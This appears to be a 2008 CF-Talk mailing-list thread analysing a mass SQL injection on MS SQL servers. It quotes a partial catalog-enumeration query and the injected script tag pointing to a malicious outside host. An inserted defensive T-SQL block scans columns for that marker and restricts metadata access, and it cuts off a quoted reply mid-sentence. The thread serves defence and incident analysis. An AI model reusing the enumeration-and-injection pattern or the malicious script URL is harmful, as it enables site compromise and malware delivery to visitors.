I tried to decipher the SQL injection which has hit my websites thousands of 
times this week.
I found this particular code (it's attacking MS SQL):

select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id 
and a.xtype='u' and (b.xtype=... or b.xtype=... or b.xtype=... or b.xtype=...)

The remaining code appends script src="http://jjmaoduo.3322.org/csrss/w.js"
to every string column found in the whole SQL DB.

Now this is real bad for shared hosting customers.
Because even if we protect our sites, that SQL simply queries all 
tables in the SQL server.
So, if you find your data compromised, the leak may have been caused 
by other sites that are using the same SQL machine, duh!

Better alert your webhosting company too.

Rizal

ColdFusion Custom Tags And More
http://www.masrizal.com

At 06:37 AM 8/8/2008, you wrote:
>I meant to say: Set the deny permission on the system table to the
>user that you use to access the database from cf
>
>At 07:27 PM 8/7/2008, you wrote:
> >You should set the permissions on the system table so that you can
> >not read or write to the system tables. There
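The thread describes an injection that enumerates every string column in every user table and then appends a script tag to each one. The following T-SQL is an added example written here for the defender's side; it is not code from this thread or from its posters. It walks the same kind of catalog metadata the attack abuses, but in order to find which columns already contain the marker string quoted above, and then applies the permission change the quoted reply suggests. Assumptions: SQL Server 2005 or later (the sys.* catalog views), and a placeholder application login named [cf_app_user].

```sql
-- Added example (not from the original thread): scan every character column of
-- every user table in the current database for the injected script reference,
-- then report the contaminated columns and their row counts.
SET NOCOUNT ON;

-- Marker taken from the attack described in the thread; extend the pattern if
-- the injected payload changes host names.
DECLARE @needle nvarchar(200);
SET @needle = N'%jjmaoduo.3322.org/csrss/w.js%';

DECLARE @schema sysname, @table sysname, @column sysname, @sql nvarchar(max);

CREATE TABLE #hits (
    schema_name   sysname,
    table_name    sysname,
    column_name   sysname,
    rows_affected int
);

-- Only base tables (sys.tables), only character types the payload can land in.
DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
    SELECT s.name, t.name, c.name
    FROM sys.tables t
    JOIN sys.schemas s  ON s.schema_id = t.schema_id
    JOIN sys.columns c  ON c.object_id = t.object_id
    JOIN sys.types   ty ON ty.user_type_id = c.user_type_id
    WHERE ty.name IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext');

OPEN cols;
FETCH NEXT FROM cols INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME guards the identifiers; the search value is passed as a parameter.
    SET @sql = N'INSERT INTO #hits SELECT @s, @t, @c, COUNT(*) FROM '
             + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE ' + QUOTENAME(@column) + N' LIKE @needle;';
    EXEC sp_executesql @sql,
         N'@s sysname, @t sysname, @c sysname, @needle nvarchar(200)',
         @schema, @table, @column, @needle;
    FETCH NEXT FROM cols INTO @schema, @table, @column;
END
CLOSE cols;
DEALLOCATE cols;

-- Every column listed here needs cleaning; an empty result means no marker found.
SELECT schema_name, table_name, column_name, rows_affected
FROM #hits
WHERE rows_affected > 0
ORDER BY schema_name, table_name, column_name;
DROP TABLE #hits;

-- Hardening from the quoted reply, translated to the 2005+ permission model
-- ([cf_app_user] is a placeholder for the login ColdFusion connects with).
-- Note the caveat: a principal still sees catalog rows for objects it holds
-- other permissions on, so this limits enumeration rather than eliminating it;
-- keeping the application login's SELECT/UPDATE grants to the minimum set of
-- tables is what actually shrinks what the injected query can reach.
DENY VIEW DEFINITION TO [cf_app_user];
```

Run the scan as a privileged account, not as the application login. On SQL Server 2000 the equivalent of the last statement is a DENY SELECT on dbo.sysobjects and dbo.syscolumns for the application user, which is what the quoted reply describes.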

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310461